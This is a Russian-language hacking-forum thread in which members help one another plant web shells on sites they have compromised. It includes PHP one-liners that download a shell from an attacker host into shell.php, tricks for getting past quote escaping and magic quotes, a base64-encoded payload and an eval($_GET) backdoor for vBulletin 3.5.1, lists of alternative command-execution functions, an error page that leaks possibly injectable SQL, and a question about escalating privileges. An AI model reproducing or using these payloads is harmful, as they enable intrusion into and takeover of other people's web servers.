Войти или зарегистрироваться
Выберите удобный способ — аккаунт создастся автоматически.
Или войдите по логину и паролю
 |
|

16.09.2009, 15:10
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
Сообщение от Explоit
а если его нету в системе? + вырублена функция system(),exex(),passtru()
shell_exec, popen, pcntl_exec.
Кроме wget есть еще links, lynx, curl, GET, fetch
|
|
|

16.09.2009, 15:22
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
С нами:
8845773
Репутация:
-11
|
|
Сообщение от InFlame
Лей шелл вот так:
Код:
<?php copy("http://hacker.host/shell.txt", "./shell.php"); ?>
либо, если экранируются кавычки:
Код:
<?php copy(stripslashes("http://hacker.host/shell.txt", "./shell.php")); ?>
Спасибо, люди!
Отдельное спасибо InFlame, за stripslashes(), я просто не как не мог допереть как обойти ковычки.
|
|
|

16.09.2009, 15:30
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от ElteRUS
Чего полезного из этого можно извлечь ?
Сам хз
Кстати, можно ли из ошибки конвертирования сделать инъекцию? При подстановке выводит
Сообщение от ElteRUS
Чего полезного из этого можно извлечь ?
Сам хз
Кстати, можно ли из ошибки конвертирования сделать инъекцию? При подстановке выводит
Код:
Server Error in '/' Application.
Input string was not in a correct format.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.FormatException: Input string was not in a correct format.
Source Error:
Line 139: forumid = CLng(SafeHTML(Request.QueryString("forumid")))
Line 140: If mode = "edit" Then
Line 141: forumid = GetSingleValueViaRS("SELECT forumid from pgd_messages with (nolock) WHERE messageID=" & CLng(SafeHTML(Request.QueryString("messageID"))), CommandType.Text, 0)
Line 142: arrTheArray = GetArrayViaRS("SELECT upfile,upfilesize from pgd_upfile with (nolock) WHERE messageID=" & CLng(SafeHTML(Request.QueryString("messageID"))), CommandType.Text)
Line 143: If IsArray(arrTheArray) Then
Source File: не скажу :) Line: 141
Stack Trace:
[FormatException: Input string was not in a correct format.]
Microsoft.VisualBasic.CompilerServices.Conversions.ParseDecimal(String Value, NumberFormatInfo NumberFormat) +718618
Microsoft.VisualBasic.CompilerServices.Conversions.ToLong(String Value) +178
[InvalidCastException: Conversion from string "1322879'" to type 'Long' is not valid.]
Microsoft.VisualBasic.CompilerServices.Conversions.ToLong(String Value) +714736
ASP.upload_aspx.__Render__control1(HtmlTextWriter __w, Control parameterContainer) in не скажу :):141
System.Web.UI.Control.RenderChildrenInternal(HtmlTextWriter writer, ICollection children) +115
System.Web.UI.Page.Render(HtmlTextWriter writer) +38
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +4240
Version Information: Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082
|
|
|

16.09.2009, 16:33
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
С нами:
9328846
Репутация:
270
|
|
вопрос такой, есть шелл (апач),так же есть файлы с правами 777 которые я могу шеллом редактить,у этих файлов владелец (вебмастер),можно за счет этого повысить права у шелла до вебмастера?вопрос навено глуповат, тут где то писалось об этом, и однозначного ответа там не прозвучало.
спасибо
|
|
|

16.09.2009, 16:59
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
milw0rm.com в помощь 
|
|
|

16.09.2009, 17:09
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
С нами:
8845773
Репутация:
-11
|
|
Плиз, дайте чёткие указание как залить шелл в vbulitin 3.5.1, я писал код в модулях,
местоположение faq_comlete, код например
copy("http://ааа/file.txt","./shell.php");
при заходе на faq.php? выскакивали "ошибки содержимого", шелл не залился. Но когда вписал
то заработало faq?e=phpinfo();
Дайте пожалуйста чёткие указания, какой код вписать в faq.?e=
|
|
|

16.09.2009, 17:14
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Код:
e=base64_decode('Y29weSgiaHR0cDovL+Dg4C9maWxlLnR4dCIsIi4vc2hlbGwucGhwIik7');
|
|
|

16.09.2009, 17:15
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
С нами:
8845773
Репутация:
-11
|
|
Сообщение от mailbrush
Код:
e=base64_decode('Y29weSgiaHR0cDovL+Dg4C9maWxlLnR4dCIsIi4vc2hlbGwucGhwIik7');
там магические кавычки в ON
|
|
|

16.09.2009, 17:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами:
10158086
Репутация:
1359
|
|
Сообщение от Explоit
там магические кавычки в ON
eval($_GET[e]);
заменить на
eval(stripslashes($_GET[e]));
|
|
|

16.09.2009, 17:23
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
С нами:
8845773
Репутация:
-11
|
|
Сообщение от geezer.code
eval($_GET[e]);
заменить на
eval(stripslashes($_GET[e]));
Секн,А такой вопрос? Кавычки при MgQ=ON, убираютья прямо в коде, или в браузере(т.е. при приёме GET запроса)
Тоесть да же когда пишешь сценарии, то например я пишу скрипт такой print("Hello World"); то, он не заработает? чтоли? изза ковычек?
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 10 (пользователей: 0 , гостей: 10)
|
|
|
|